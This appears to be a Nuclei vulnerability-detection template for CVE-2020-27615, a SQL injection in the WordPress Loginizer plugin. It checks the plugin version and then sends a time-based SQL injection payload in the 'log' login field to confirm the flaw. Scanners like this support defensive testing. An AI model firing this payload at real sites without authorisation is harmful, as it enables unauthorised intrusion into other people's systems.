漏洞描述
The Loginizer plugin before 1.6.4 for WordPress allows SQL injection (with resultant XSS), related to loginizer_login_failed and lz_valid_ip.
id: CVE-2020-27615
info:
name: WordPress Loginizer < 1.6.4 – Unauthenticated SQL Injection via `log` Parameter
author: intelligent-ears
severity: critical
description: |
The Loginizer plugin before 1.6.4 for WordPress allows SQL injection (with resultant XSS), related to loginizer_login_failed and lz_valid_ip.
remediation: Fixed in version 1.6.4
reference:
- https://web.archive.org/web/20210321225040/https://wpscan.com/vulnerability/10441/
- https://www.zdnet.com/article/wordpress-deploys-forced-security-update-for-dangerous-bug-in-popular-plugin/
- https://wpscan.com/vulnerability/10441
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-27615
cwe-id: CWE-89
epss-score: 0.80754
epss-percentile: 0.99094
cpe: cpe:2.3:a:loginizer:loginizer:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: loginizer
product: loginizer
framework: wordpress
publicwww-query: "/wp-content/plugins/loginizer"
tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,loginizer,sqli,time-based,vkev,vuln
variables:
password: "{{rand_base(8)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/loginizer/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'Loginizer')"
- compare_versions(version, '< 1.6.4')
condition: and
internal: true
extractors:
- type: regex
part: body
group: 1
name: version
regex:
- 'Stable tag: ([0-9.]+)'
internal: true
- raw:
- |
@timeout 10s
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check;
log='%2cip%3dLEFT(UUID()%2c8)%2curl%3dif(1%3d1%2csleep(7)%2c0)%23&pwd={{password}}&wp-submit=Login&redirect_to=&testcookie=1
matchers:
- type: dsl
dsl:
- 'duration >= 7'
- 'contains_all(body,"wp-admin","user_login")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220589ed7d441e5e4c8dd53a94bd0f9b55b148e61e4c5f968eabf111fc4b72e738c02210097b8f9dac44e4ace716c3479f013686d93646b3d63e7666519be9b2117b25dff:922c64590222798bb761d5b6d8e72950